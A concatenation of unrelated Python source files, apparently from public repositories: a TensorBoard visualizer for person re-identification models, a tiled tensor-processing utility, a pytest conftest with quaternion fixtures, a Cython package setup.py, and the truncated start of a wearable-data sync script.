DEFAULT_LIST_LENGTH = 10
def __init__(self, config, name, model, pretrain, epoch, split, scene, query_list: list, length: int):
if not isinstance(name, Visualizer.Name):
if isinstance(name, str):
if not name.islower():
name = name.lower()
if name not in Visualizer.NAME_LIST:
raise ValueError(value_error_msg('name', name, Visualizer.NAME_LIST))
name = Visualizer.Name(name)
else:
raise TypeError(type_error_msg('name', name, [Visualizer.Name, str]))
if not isinstance(model, Visualizer.Model):
if isinstance(model, str):
if not model.islower():
model = model.lower()
if model not in Visualizer.MODEL_LIST:
raise ValueError(value_error_msg('model', model, Visualizer.MODEL_LIST))
model = Visualizer.Model(model)
else:
raise TypeError(type_error_msg('model', model, [Visualizer.Model, str]))
if not isinstance(epoch, int):
raise TypeError(type_error_msg('epoch', epoch, [int]))
if not epoch >= 0:
raise ValueError(value_error_msg('epoch', epoch, 'epoch >= 0'))
if not isinstance(split, Visualizer.Split):
if isinstance(split, str):
if not split.islower():
split = split.lower()
if split not in Visualizer.SPLIT_LIST:
raise ValueError(value_error_msg('split', split, Visualizer.SPLIT_LIST))
split = Visualizer.Split(split)
else:
raise TypeError(type_error_msg('split', split, [Visualizer.Split, str]))
if not isinstance(scene, Visualizer.Scene):
if isinstance(scene, str):
if not scene.islower():
scene = scene.lower()
if scene not in Visualizer.SCENE_LIST:
raise ValueError(value_error_msg('scene', scene, Visualizer.SCENE_LIST))
scene = Visualizer.Scene(scene)
else:
raise TypeError(type_error_msg('scene', scene, [Visualizer.Scene, str]))
if not isinstance(query_list, Iterable):
raise TypeError(type_error_msg('query_list', query_list, Iterable))
if not isinstance(length, int):
raise TypeError(type_error_msg('length', length, [int]))
if not length > 0:
raise ValueError(value_error_msg('length', length, 'length > 0',
Visualizer.DEFAULT_LIST_LENGTH))
self.config = config
self.name = name
self.model = model
self.train_class = config.getint(self.name.value, 'train_class')
# initialize model
model_name = self.model.value
if self.model == Visualizer.Model.RESNET50:
self.model = ResNet50(self.config, self.train_class, False)
elif self.model == Visualizer.Model.MSSNET:
self.model = MssNet(self.config)
else:
raise ValueError(value_error_msg('model', model, [Visualizer.Model.RESNET50]))
# load weights
load_model(self.model, self.config[self.name.value]['model_format'] % (model_name, epoch))
self.split = split
self.scene = scene
self.query_list = query_list
self.length = length
self.tensorboard_dir = self.config[self.name.value]['tensorboard_dir']
# WARNING: the log files won' t be saved
rmtree(self.tensorboard_dir, ignore_errors=True)
self.writer = SummaryWriter(join(self.tensorboard_dir, self.name.value))
# dataset loading
self.dataset_type = ['gallery', 'query']
if self.scene == Visualizer.Scene.MULTI_SHOT:
self.dataset_type.append('multi_query')
self.dataset = {}
for item in self.dataset_type:
self.dataset[item] = ExtendedDataset(self.name.value,
join(self.config[self.name.value]['dataset_dir'], item))
self.suffix = 'pretrain' if pretrain else 'no_pretrain'
self.train_path = self.config[self.name.value]['train_path'] % self.suffix
self.test_path = self.config[self.name.value]['test_path'] % self.scene.value
self.evaluation_path = self.config[self.name.value]['evaluation_path'] % self.scene.value
def draw_projection(self):
"""
Reads: A mat file of saved gallery and query info.
Processes: Draws images' embedding to illustrate clustering.
Writes: Log files.
"""
class_dict = OrderedDict(Counter(self.dataset['gallery'].ids))
# {class1: num1, class2: num2, ...}(dict) <-
# "the dictionary made up of the class and the corresponding indices num"
class_num = tuple(class_dict.values())
# (num1, num2, ...)(tuple) <- "the corresponding indices num of each class"
class_index_range = np.cumsum(np.asarray((0,) + class_num)).tolist()
# [0, num1, num1+num2, ...](list) <- "the starting and ending indices of each class, like ticks"
chosen_index = []
for i in class_index_range[2: 32]: # skip id -1(stands for junk image) and id 0(stands for distractor)
chosen_index.extend(list(range(i, i + 3)))
images = self.dataset['gallery'][chosen_index]
labels = torch.as_tensor(self.dataset['gallery'].ids)[chosen_index]
features = loadmat(self.test_path)['gallery_feature'][chosen_index]
horizontal_pad = (max(images[0].size) - min(images[0].size)) // 2
tranform_list = [
transforms.Pad((horizontal_pad, 0, horizontal_pad, 0), (255, 255, 255)),
# pad image in 2:1 to 1:1,
# note that using white to pad on the left and the right will cause unwanted occlusion
# when image density is higher,
# one way to cope is convert image to RGBA mode and set A = 100 for padded pixels, (but it is troublesome)
# transforms.CenterCrop(max(images[0].size)),
# this way will create image edged with black(really unbearable for me)
transforms.ToTensor()
]
square_images = [transforms.Compose(tranform_list)(image) for image in images]
self.writer.add_embedding(features, metadata=labels, label_img=torch.stack(square_images))
self.writer.close()
def draw_model(self):
"""
Reads: None.
Processes: Draws model's structure.
Writes: Log files.
"""
one_image = transforms.ToTensor()(self.dataset['query'][0]).unsqueeze(0) # Any input image tensor.
self.writer.add_graph(self.model, one_image)
self.writer.close()
@staticmethod
def heatmap(ax, x):
"""
Reads: None.
Processes: Draws heatmap of one layer.
Writes: Log files.
"""
heatmap_numpy = x.squeeze().sum(dim=0).numpy()
ax.set_xlabel('{}*{}'.format(heatmap_numpy.shape[0], heatmap_numpy.shape[1]), fontsize=8)
return ax.imshow(heatmap_numpy, cmap='viridis')
def draw_heatmap(self, query_list):
"""
Reads: None.
Processes: Draws heatmap of a specific model.
Writes: Log files.
"""
if isinstance(self.model, ResNet50):
length = 6
structure_list = ['original', 'conv1', 'maxpool', 'layer1', 'layer2', 'layer3']
for j, query in enumerate(query_list):
query_img = self.dataset['query'][query]
query_label = self.dataset['query'].ids[query]
fig, ax = plt.subplots(ncols=length, constrained_layout=False)
ax[0].imshow(query_img)
for i, one_ax in enumerate(ax):
one_ax.set_xticks([])
one_ax.set_yticks([])
if i == 0:
one_ax.set_title('query')
else:
one_ax.set_title(structure_list[i])
x = transforms.ToTensor()(query_img).unsqueeze(0)
x = self.model.model.conv1(x) # 1
Visualizer.heatmap(ax[1], x)
x = self.model.model.bn1(x)
x = self.model.model.relu(x)
x = self.model.model.maxpool(x) # 2
Visualizer.heatmap(ax[2], x)
x = self.model.model.layer1(x) # 3
Visualizer.heatmap(ax[3], x)
x = self.model.model.layer2(x) # 4
Visualizer.heatmap(ax[4], x)
x = self.model.model.layer3(x) # 5
heatmap = Visualizer.heatmap(ax[5], x)
fig.colorbar(heatmap, pad=0.15)
fig.suptitle(query_label)
self.writer.add_figure('query_through_model', fig, j)
else:
raise ValueError(value_error_msg('model', self.model, ResNet50))
self.writer.close()
def draw_loss(self):
"""
Reads: A mat file of losses/errors.
Processes: Draws loss curve.
Writes: Log files.
"""
mat_dict = loadmat(self.train_path)
training_loss = mat_dict['training_loss'].reshape(-1)
if self.split == Visualizer.Split.TRAIN_ONLY:
for epoch, loss in enumerate(training_loss):
self.writer.add_scalar('training loss', loss, epoch)
elif self.split == Visualizer.Split.TRAIN_VAL:
validation_loss = mat_dict['validation_loss'].reshape(-1)
for epoch, train_val in enumerate(zip(training_loss, validation_loss)):
self.writer.add_scalars('loss', {
'train': train_val[0],
'val': train_val[1]
}, epoch)
self.writer.close()
def draw_error(self):
"""
Reads: A mat file of losses/errors.
Processes: Draws error curve.
Writes: Log files.
"""
mat_dict = loadmat(self.train_path)
training_error = mat_dict['training_error'].reshape(-1)
if self.split == Visualizer.Split.TRAIN_ONLY:
for epoch, error in enumerate(training_error):
self.writer.add_scalar('training error', error, epoch)
elif self.split == Visualizer.Split.TRAIN_VAL:
validation_error = mat_dict['validation_error'].reshape(-1)
for epoch, train_val in enumerate(zip(training_error, validation_error)):
self.writer.add_scalars('error', {
'train': train_val[0],
'val': train_val[1]
}, epoch)
self.writer.close()
def draw_CMC(self):
"""
Reads: A mat file of evaluation indicators and rank lists.
Processes: Draws Cumulative Match Curve.
Writes: Log files.
"""
CMC = loadmat(self.evaluation_path)['CMC'].reshape(-1)
for index, cmc in enumerate(CMC):
self.writer.add_scalar('CMC', cmc, index)
self.writer.close()
def draw_query_image(self, query_list):
"""
Args:
query_list (list): The list of query indices.
Reads: A mat file of saved gallery and query info.
Processes: Draws query images.
Writes: Log files.
"""
if self.scene == Visualizer.Scene.SINGLE_SHOT:
for j, query in enumerate(query_list):
query_img = self.dataset['query'][query]
query_label = self.dataset['query'].ids[query]
fig, ax = plt.subplots()
ax.imshow(query_img)
ax.set_xticks([])
ax.set_yticks([]) # serve as thin black border
fig.suptitle(query_label)
self.writer.add_figure('query', fig, j)
elif self.scene == Visualizer.Scene.MULTI_SHOT:
multi_index = loadmat(self.test_path)['multi_index'].reshape(-1)[query_list]
for i, indices in enumerate(multi_index):
indices = indices.reshape(-1)
length = indices.shape[0]
sum_row = ceil(float(length) / Visualizer.DEFAULT_LIST_LENGTH)
sum_column = min(Visualizer.DEFAULT_LIST_LENGTH, length)
fig, ax = plt.subplots(sum_row, sum_column, constrained_layout=False, squeeze=False)
for j in range(length):
row = j // Visualizer.DEFAULT_LIST_LENGTH
column = j % Visualizer.DEFAULT_LIST_LENGTH
one_ax = ax[row][column]
one_ax.set_title('%d' % (j + 1))
one_ax.set_xticks([])
one_ax.set_yticks([])
one_ax.imshow(self.dataset['multi_query'][indices[j]])
column = length % sum_column
if column != 0:
for j in range(column, sum_column):
ax[sum_row - 1][j].axis('off') # clear not used axises on the figure
fig.suptitle('%d@cam %d' % (self.dataset['query'].ids[query_list[i]],
self.dataset['query'].cams[query_list[i]]))
self.writer.add_figure('query list', fig, i)
self.writer.close()
def draw_rank_list(self, query_list, length: int = DEFAULT_LIST_LENGTH):
"""
Args:
query_list (list): The list of query indices.
length (int): The length of rank list for every query.
Reads: A mat file of evaluation indicators and rank lists.
Processes: Draws rank list for each query.
Writes: Log files.
"""
evaluation_dict = loadmat(self.evaluation_path)
index_array = evaluation_dict['index'].reshape(-1)
ap_array = evaluation_dict['ap'].reshape(-1)
for i, query in enumerate(query_list):
query_img = self.dataset['query'][query]
query_label = self.dataset['query'].ids[query]
sum_row = ceil(float(length) / (Visualizer.DEFAULT_LIST_LENGTH + 1))
sum_column = min(Visualizer.DEFAULT_LIST_LENGTH + 1, length + 1)
fig, ax = plt.subplots(sum_row, sum_column, constrained_layout=False, squeeze=False)
ax[0][0].set_xticks([])
ax[0][0].set_yticks([])
ax[0][0].imshow(query_img)
ax[0][0].set_title('query')
ax[0][0].set_xlabel(query_label, fontsize=8)
fig.suptitle('query {}(ap={:.2f}%)'.format(query, ap_array[query] * 100))
rank_index = index_array[query].reshape(-1)[:length]
for j, index in enumerate(rank_index):
gallery_img = self.dataset['gallery'][index]
gallery_label = self.dataset['gallery'].ids[index]
row = (j + 1) // (Visualizer.DEFAULT_LIST_LENGTH + 1)
column = (j + 1) % (Visualizer.DEFAULT_LIST_LENGTH + 1)
one_ax = ax[row][column]
one_ax.set_xticks([])
one_ax.set_yticks([])
one_ax.imshow(gallery_img)
if gallery_label == query_label:
color = 'green'
one_ax.set_title('%d' % (j + 1), color=color)
for item in one_ax.spines.values():
item.set_color(color)
one_ax.set_xlabel(gallery_label, fontsize=8, color=color)
else:
color = 'red'
one_ax.set_title('%d' % (j + 1), color=color)
for item in one_ax.spines.values():
item.set_color(color)
one_ax.set_xlabel(gallery_label, fontsize=8, color=color)
column = (length + 1) % sum_column
if column != 0:
for j in range(column, sum_column):
ax[sum_row - 1][j].axis('off')
self.writer.add_figure('rank list', fig, i)
# self.writer.add_figure('rank list({})'.format(self.scene.value), fig, i)
# It is surprising that the tag string param in writer.add_figure can't be any brackets,
# and the brackets are shown as '___'.
self.writer.close()
    @timer
    def run(self):
        """
        Reads: A mat file of evaluation indicators and rank lists and a mat file of training loss.
        Processes: Draws pics using matplotlib.pyplot.
        Writes: Log files.
        """
        # Log which visualizer subclass / scene combination is running.
        Visualizer.run_info(self.__class__.__name__, '{}, {}'.format(self.suffix, self.scene.value))
        # NOTE(review): no_grad suggests some draw_* helpers run the network
        # (e.g. projections/heatmaps) — gradients are never needed here; confirm.
        with torch.no_grad():
            self.draw_projection()
            self.draw_model()
            self.draw_query_image(self.query_list)
            self.draw_heatmap(self.query_list)
            self.draw_rank_list(self.query_list, self.length)
            self.draw_loss()
            self.draw_error()
            self.draw_CMC()
        # os.system('tensorboard --logdir=%s' % self.tensorboard_dir)
|
<gh_stars>1-10
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import torch
def block_process_2d(data, func, block_size=512, overlap=32, intermediate_as_double=False):
    """Apply ``func`` to a 4-D tensor by tiling its last two dimensions.

    The input (NCHW layout) is split into ``block_size`` x ``block_size``
    tiles overlapping by ``overlap`` pixels per axis; each tile is run
    through ``func`` independently and the results are blended back with a
    linear weight ramp across the overlapping strips (a weighted average
    whose weights taper toward tile edges).

    Note:
        ``data`` is expected to hold floating-point values (float or double),
        and ``func`` must preserve the spatial size of the tile it receives.

    Args:
        data (torch.Tensor): 4-D input tensor to be processed by ``func``.
        func (Callable): Applied to each tile; may return a single tensor or
            a list of tensors (each with the tile's H and W).
        block_size (int): Side length of each square tile.
        overlap (int): Number of pixels adjacent tiles share per axis.
        intermediate_as_double (bool): Accumulate in ``double`` precision,
            which improves accuracy at the cost of memory.

    Returns:
        torch.Tensor or list[torch.Tensor]: ``func`` applied to ``data``;
        a list is returned iff ``func`` returns a list.

    Raises:
        ValueError: On non-4-D input, inconsistent ``overlap``/``block_size``,
            input smaller than ``block_size``, or unexpected ``func`` output.

    Example:
        ::
            def f(x):
                assert x.shape[2] <= 64
                assert x.shape[3] <= 64
                return x * x + x * x
            x = torch.ones(3, 3, 512, 512, dtype=torch.float32)
            r = dlutils.block_process_2d(x, f, block_size=32, overlap=8)
    """
    # Was `if not 0.0 != len(data.shape)`, which only rejected 0-d input even
    # though the code below indexes `data` as NCHW; require 4-D explicitly.
    if len(data.shape) != 4:
        raise ValueError("Invalid dimensionality of input data: {}".format(data.shape))
    # overlap >= block_size would make the stride non-positive (division by
    # zero / nonsense tiling below), so reject it alongside negative values.
    if not 0 <= overlap < block_size:
        raise ValueError("Invalid value for overlap: {}".format(overlap))
    width = data.shape[-1]
    height = data.shape[-2]
    # Tiles are always full block_size squares; smaller inputs would produce
    # negative (wrapping) slice offsets and silently wrong results.
    if width < block_size or height < block_size:
        raise ValueError(
            "block_size {} exceeds input spatial size {}x{}".format(block_size, height, width))
    stride = block_size - overlap
    blocks = []
    for i in range((width + stride - 1) // stride):
        # Snap the last tile back so it ends exactly at the image border.
        offset_x = min(i * stride + block_size, width) - block_size
        w = min(offset_x + block_size, width) - offset_x
        for j in range((height + stride - 1) // stride):
            offset_y = min(j * stride + block_size, height) - block_size
            h = min(offset_y + block_size, height) - offset_y
            blocks.append((offset_x, offset_y, w, h))
    results = []
    for offset_x, offset_y, w, h in blocks:
        res = func(data[:, :, offset_y:offset_y + h, offset_x:offset_x + w])
        if isinstance(res, list):
            if not all(isinstance(x, torch.Tensor) for x in res):
                raise ValueError(
                    "Function must return either torch.Tensor or list of torch.Tensor. "
                    "But got list of {}".format([type(x) for x in res]))
        elif not isinstance(res, torch.Tensor):
            raise ValueError(
                "Function must return either torch.Tensor or list of torch.Tensor. "
                "But got {}".format(type(res)))
        results.append(res)
    # Normalize to the list-of-lists form; remember whether to unwrap later.
    returns_value = all(isinstance(x, torch.Tensor) for x in results)
    if returns_value:
        results = [[x] for x in results]
    elif not all(isinstance(x, list) for x in results):
        raise ValueError("Function must return either torch.Tensor or list of torch.Tensor.")
    # Accumulator dtype: keeping counts/weights in `double` unconditionally
    # (as before) makes the in-place `+=`/`/=` on float32 outputs fail under
    # torch's type-promotion rules, so follow the requested precision.
    acc_dtype = torch.double if intermediate_as_double else data.dtype
    output = [
        torch.zeros(*t.shape[:2], height, width,
                    dtype=torch.double if intermediate_as_double else t.dtype)
        for t in results[0]
    ]
    counts = torch.zeros(1, 1, height, width, dtype=acc_dtype)
    weight_mask = torch.ones(1, 1, block_size, block_size, dtype=acc_dtype)
    for i in range(overlap):
        ramp = (i + 1) / overlap
        weight_mask[:, :, :, i] *= ramp
        # Was `-i`: at i == 0 that re-weighted column 0 instead of the last
        # column, double-tapering one edge and leaving the other untouched.
        weight_mask[:, :, :, -(i + 1)] *= ramp
        weight_mask[:, :, i, :] *= ramp
        weight_mask[:, :, -(i + 1), :] *= ramp
    for block, res in zip(blocks, results):
        offset_x, offset_y, w, h = block
        counts[:, :, offset_y:offset_y + h, offset_x:offset_x + w] += weight_mask
        for o, r in zip(output, res):
            o[:, :, offset_y:offset_y + h, offset_x:offset_x + w] += (r * weight_mask).to(o.dtype)
    # Divide by the accumulated weights, then cast back to func's output dtype.
    final = []
    for o, template in zip(output, results[0]):
        o /= counts.to(o.dtype)
        final.append(o.to(template.dtype))
    output = final
    if returns_value:
        return output[0]
    return output
if __name__ == '__main__':
    # Smoke tests / usage demo for block_process_2d.

    def square_twice(x):
        # Every tile handed to the callback must respect the block size.
        assert x.shape[2] <= 64
        assert x.shape[3] <= 64
        return x * x + x * x

    def multi_output(x):
        assert x.shape[2] <= 64
        assert x.shape[3] <= 64
        return [x * 3, x * x + x * x]

    ones = torch.ones(3, 3, 512, 512, dtype=torch.float32)
    print(block_process_2d(ones, square_twice, block_size=32, overlap=8))

    ones = torch.ones(3, 3, 512, 512, dtype=torch.float32)
    print(block_process_2d(ones, multi_output, block_size=32, overlap=8))

    # With double-precision accumulation the chunked result matches the
    # direct computation to (effectively) full precision...
    noise = torch.randn(3, 3, 512, 512, dtype=torch.float32)
    out = block_process_2d(noise, square_twice, block_size=32, overlap=8, intermediate_as_double=True)
    assert torch.all(torch.abs(out - (noise * noise + noise * noise)) < 1e-18)

    # ...and with float accumulation to single precision.
    noise = torch.randn(3, 3, 512, 512, dtype=torch.float32)
    out = block_process_2d(noise, square_twice, block_size=32, overlap=8, intermediate_as_double=False)
    assert torch.all(torch.abs(out - (noise * noise + noise * noise)) < 1e-5)
|
<gh_stars>10-100
# Copyright (c) 2021, <NAME>
# See LICENSE file for details: <https://github.com/moble/spherical/blob/master/LICENSE>
# Standard library
import os
import warnings

# Third-party
import numpy as np
import pytest
import quaternionic
# Default maximum ell used when the --ell_max option is not given.
ell_max_default = 36

# Optional test dependencies: when a package is unavailable, replace the
# corresponding decorator with a pytest skip marker so dependent tests are
# skipped instead of erroring at collection time.
try:
    import spinsfast
    requires_spinsfast = lambda f: f
except ImportError:  # was a bare `except:`, which would also hide e.g. SystemExit
    requires_spinsfast = pytest.mark.skip(reason="spinsfast is missing")

try:
    import scipy
    requires_scipy = lambda f: f
except ImportError:
    requires_scipy = pytest.mark.skip(reason="scipy is missing")

try:
    import sympy
    requires_sympy = lambda f: f
except ImportError:
    requires_sympy = pytest.mark.skip(reason="sympy is missing")
def pytest_addoption(parser):
    """Register the command-line options controlling test size and speed."""
    int_options = [
        ("--ell_max", ell_max_default, "Maximum ell value to test"),
        ("--ell_max_slow", ell_max_default // 2, "Maximum ell value to test with slow tests"),
    ]
    for flag, default, helptext in int_options:
        parser.addoption(flag, action="store", type=int, default=default, help=helptext)
    parser.addoption("--run_slow_tests", action="store_true", default=False,
                     help="Run all tests, including slow ones")
def pytest_configure(config):
    """Declare the custom ``slow`` marker so pytest does not warn about it."""
    marker_spec = "slow: marks tests as slow"
    config.addinivalue_line("markers", marker_spec)
def pytest_collection_modifyitems(config, items):
    """Skip every ``slow``-marked test unless --run_slow_tests was given."""
    if config.getoption("--run_slow_tests"):
        return
    skip_marker = pytest.mark.skip(reason="need --run_slow_tests option to run")
    for item in (it for it in items if "slow" in it.keywords):
        item.add_marker(skip_marker)
def pytest_runtest_setup(item):
    """Second line of defense: skip a ``slow`` test at setup time."""
    is_slow = 'slow' in item.keywords
    if is_slow and not item.config.getoption("--run_slow_tests"):
        pytest.skip("Need `--run_slow_tests` command-line argument to run")
@pytest.fixture
def ell_max(request):
    """Maximum ell value, as set by the --ell_max command-line option."""
    configured = request.config.getoption("--ell_max")
    return configured
@pytest.fixture
def ell_max_slow(request):
    """Maximum ell for slow tests, from the --ell_max_slow option."""
    configured = request.config.getoption("--ell_max_slow")
    return configured
@pytest.fixture
def special_angles():
    """Angles from -pi to pi (inclusive) in steps of pi/4."""
    step = np.pi / 4.
    # The +0.1 slop makes the arange endpoint-inclusive at +pi.
    return np.arange(-np.pi, np.pi + 0.1, step)
@pytest.fixture
def on_windows():
    """True on Windows ('win32'/'cygwin'), excluding macOS ('darwin')."""
    from sys import platform
    lowered = platform.lower()
    return 'win' in lowered and 'darwin' not in lowered
@pytest.fixture
def eps():
    """Machine epsilon for double-precision floats."""
    machine_eps = np.finfo(float).eps
    return machine_eps
def quaternion_sampler():
    """Return ``(Qs_array, names)``: a fixed array of sample quaternions and
    an attribute-style object mapping each descriptive name to its row index.
    """
    samples = [
        [np.nan, 0., 0., 0.],
        [np.inf, 0., 0., 0.],
        [-np.inf, 0., 0., 0.],
        [0., 0., 0., 0.],
        [1., 0., 0., 0.],
        [0., 1., 0., 0.],
        [0., 0., 1., 0.],
        [0., 0., 0., 1.],
        [1.1, 2.2, 3.3, 4.4],
        [-1.1, -2.2, -3.3, -4.4],
        [1.1, -2.2, -3.3, -4.4],
        [
            0.18257418583505537115232326093360,
            0.36514837167011074230464652186720,
            0.54772255750516611345696978280080,
            0.73029674334022148460929304373440
        ],
        [1.7959088706354, 0.515190292664085, 0.772785438996128, 1.03038058532817],
        [2.81211398529184, -0.392521193481878, -0.588781790222817, -0.785042386963756],
    ]
    Qs_array = quaternionic.array(samples)
    names = type("QNames", (object,), dict())()
    row_names = [
        "q_nan1", "q_inf1", "q_minf1", "q_0", "q_1", "x", "y", "z",
        "Q", "Qneg", "Qbar", "Qnormalized", "Qlog", "Qexp",
    ]
    for row, attr in enumerate(row_names):
        setattr(names, attr, row)
    return Qs_array, names
@pytest.fixture
def Qs():
    """The sample quaternion array from quaternion_sampler."""
    Qs_array, _ = quaternion_sampler()
    return Qs_array
@pytest.fixture
def Q_names():
    """The row-name index object from quaternion_sampler."""
    _, names = quaternion_sampler()
    return names
@pytest.fixture
def Q_conditions():
    """Integer index sets classifying the rows of the sampler array.

    Each attribute (``zero``, ``nan``, ``finite``, ...) holds the indices of
    the sample quaternions satisfying that predicate; comparison against
    ``Qs_array[names.q_0]`` selects rows equal to the zero quaternion.
    """
    Qs_array, names = quaternion_sampler()
    conditions = type("QConditions", (object,), dict())()
    # The element-wise nan/inf comparisons below emit RuntimeWarnings;
    # silence them for the duration of this setup.
    # (Relies on the module-level `import warnings`.)
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")
        conditions.zero = np.arange(len(Qs_array))[Qs_array == Qs_array[names.q_0]]
        conditions.nonzero = np.arange(len(Qs_array))[np.nonzero(Qs_array)]
        conditions.nan = np.arange(len(Qs_array))[np.isnan(Qs_array)]
        conditions.nonnan = np.arange(len(Qs_array))[~np.isnan(Qs_array)]
        conditions.nonnannonzero = np.arange(len(Qs_array))[~np.isnan(Qs_array) & (Qs_array != Qs_array[names.q_0])]
        conditions.inf = np.arange(len(Qs_array))[np.isinf(Qs_array)]
        conditions.noninf = np.arange(len(Qs_array))[~np.isinf(Qs_array)]
        conditions.noninfnonzero = np.arange(len(Qs_array))[~np.isinf(Qs_array) & (Qs_array != Qs_array[names.q_0])]
        conditions.finite = np.arange(len(Qs_array))[np.isfinite(Qs_array)]
        conditions.nonfinite = np.arange(len(Qs_array))[~np.isfinite(Qs_array)]
        conditions.finitenonzero = np.arange(len(Qs_array))[np.isfinite(Qs_array) & (Qs_array != Qs_array[names.q_0])]
    return conditions
@pytest.fixture
def Rs():
    """A reproducible batch of unit quaternions: the lattice {0, -1, 1}^4
    minus the zero quaternion, plus 20 random ones, all normalized."""
    np.random.seed(1842)
    basis_values = [0, -1., 1.]
    lattice = [
        [w, x, y, z]
        for w in basis_values
        for x in basis_values
        for y in basis_values
        for z in basis_values
    ]
    rs = lattice[1:]  # drop the all-zero quaternion
    for _ in range(20):
        rs.append(quaternionic.array(np.random.uniform(-1, 1, size=4)))
    return quaternionic.array(rs).normalized
|
<filename>setup.py
#!/usr/bin/env python
from __future__ import print_function
import os
import sys
import contextlib
from setuptools import Extension, setup
from distutils.command.build_ext import build_ext
from distutils.sysconfig import get_python_inc
from distutils import ccompiler, msvccompiler
from Cython.Build import cythonize
PACKAGES = ["preshed", "preshed.tests"]
# Cython extension modules, as dotted module names (each compiled from a .pyx).
MOD_NAMES = ["preshed.maps", "preshed.counter", "preshed.bloom"]
# By subclassing build_extensions we have the actual compiler that will be used which is really known only after finalize_options
# http://stackoverflow.com/questions/724664/python-distutils-how-to-get-a-compiler-that-is-going-to-be-used
# Per-compiler flags: MSVC has its own flag syntax; everything else is
# assumed to accept GCC/Clang-style options.
compile_options = {
    "msvc": ["/Ox", "/EHsc"],
    "other": ["-O3", "-Wno-strict-prototypes", "-Wno-unused-function"],
}
link_options = {"msvc": [], "other": []}
class build_ext_options:
    """Mixin that applies the per-compiler compile/link flags to every extension."""

    def build_options(self):
        compiler_type = self.compiler.compiler_type
        extra_compile = compile_options.get(compiler_type, compile_options["other"])
        extra_link = link_options.get(compiler_type, link_options["other"])
        for extension in self.extensions:
            extension.extra_compile_args = extra_compile
            extension.extra_link_args = extra_link
class build_ext_subclass(build_ext, build_ext_options):
    # build_ext that injects compiler-specific flags before compiling; the
    # compiler type is only known here, after finalize_options has run.
    def build_extensions(self):
        build_ext_options.build_options(self)
        build_ext.build_extensions(self)
def clean(path):
    """Remove generated build artifacts (.so/.html/.cpp/.c) for each module."""
    artifact_suffixes = (".so", ".html", ".cpp", ".c")
    for mod_name in MOD_NAMES:
        base = os.path.join(path, mod_name.replace(".", "/"))
        for suffix in artifact_suffixes:
            target = base + suffix
            if os.path.exists(target):
                os.unlink(target)
@contextlib.contextmanager
def chdir(new_dir):
    """Temporarily cd into *new_dir* and put it at the front of sys.path.

    Both the working directory and sys.path are restored on exit, even if
    the body raises.

    Args:
        new_dir: Directory to change into.

    Raises:
        OSError: If *new_dir* does not exist or cannot be entered.
    """
    old_dir = os.getcwd()
    # Perform the setup BEFORE entering the try/finally: previously a failing
    # os.chdir() still ran the cleanup, which popped an unrelated entry off
    # sys.path via `del sys.path[0]`.
    os.chdir(new_dir)
    sys.path.insert(0, new_dir)
    try:
        yield
    finally:
        # Undo exactly what was done above, in reverse order.
        del sys.path[0]
        os.chdir(old_dir)
def setup_package():
    """Build and install preshed.

    Reads package metadata from preshed/about.py, cythonizes the extension
    modules, and invokes setuptools.setup.  Running ``python setup.py clean``
    instead removes previously generated artifacts.
    """
    root = os.path.abspath(os.path.dirname(__file__))
    if len(sys.argv) > 1 and sys.argv[1] == "clean":
        return clean(root)
    with chdir(root):
        # Execute about.py into a dict rather than importing it, so setup
        # works before the package itself is importable.
        with open(os.path.join(root, "preshed", "about.py")) as f:
            about = {}
            exec(f.read(), about)
        with open(os.path.join(root, "README.md")) as f:
            readme = f.read()
        include_dirs = [get_python_inc(plat_specific=True)]
        # Build version 9 is MSVC 9 / Visual Studio 2008; include/msvc9
        # presumably ships compatibility headers for it — confirm.
        if (
            ccompiler.new_compiler().compiler_type == "msvc"
            and msvccompiler.get_build_version() == 9
        ):
            include_dirs.append(os.path.join(root, "include", "msvc9"))
        ext_modules = []
        for mod_name in MOD_NAMES:
            mod_path = mod_name.replace(".", "/") + ".pyx"
            ext_modules.append(
                Extension(
                    mod_name, [mod_path], language="c++", include_dirs=include_dirs
                )
            )
        setup(
            name="preshed",
            zip_safe=False,
            packages=PACKAGES,
            package_data={"": ["*.pyx", "*.pxd"]},
            description=about["__summary__"],
            long_description=readme,
            long_description_content_type="text/markdown",
            author=about["__author__"],
            author_email=about["__email__"],
            version=about["__version__"],
            url=about["__uri__"],
            license=about["__license__"],
            ext_modules=cythonize(ext_modules, language_level=2),
            setup_requires=["cython>=0.28", "cymem>=2.0.2,<2.1.0", "murmurhash>=0.28.0,<1.1.0"],
            install_requires=["cymem>=2.0.2,<2.1.0", "murmurhash>=0.28.0,<1.1.0"],
            classifiers=[
                "Environment :: Console",
                "Intended Audience :: Developers",
                "Intended Audience :: Science/Research",
                "License :: OSI Approved :: MIT License",
                "Operating System :: POSIX :: Linux",
                "Operating System :: MacOS :: MacOS X",
                "Operating System :: Microsoft :: Windows",
                "Programming Language :: Cython",
                "Programming Language :: Python :: 2.7",
                "Programming Language :: Python :: 3.5",
                "Programming Language :: Python :: 3.6",
                "Programming Language :: Python :: 3.7",
                "Programming Language :: Python :: 3.8",
                "Programming Language :: Python :: 3.9",
                "Programming Language :: Python :: 3.10",
                "Topic :: Scientific/Engineering",
            ],
            cmdclass={"build_ext": build_ext_subclass},
        )


if __name__ == "__main__":
    setup_package()
|
<reponame>molaruna/rcs_wearable_analysis
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This function synchronizes and processes all data from the local directory
it is run. This data can include files from the Summit RC+S system, Apple watches,
PKG watches, and patient reports.
All data must be CSV formatted and include a 'timestamp' column header
python3 sync_data.py <feature_key> <target_key>
python3 sync_data.py 'spectra' 'DK'
@author: mariaolaru
"""
import sync_funcs as sync
def main(data_dir, feature_key):
    """Synchronize RC+S spectral features with wearable targets and analyze them.

    Processes every CSV in *data_dir* (assumes a 250 Hz sampling rate):
    merges the feature and target streams, plots spectra and summary
    statistics, computes PCA and correlations, and fits linear regressions.

    Args:
        data_dir: Directory containing the CSV-formatted input files.
        feature_key: Which feature set to analyze (e.g. 'spectra',
            'fooof_peak_rm').
    """
    # Wearable score streams we try to align with the neural features.
    target_list = ['pkg_dk', 'apple_dk', 'pkg_bk', 'pkg_tremor', 'apple_tremor']

    sync.preproc_files(data_dir)
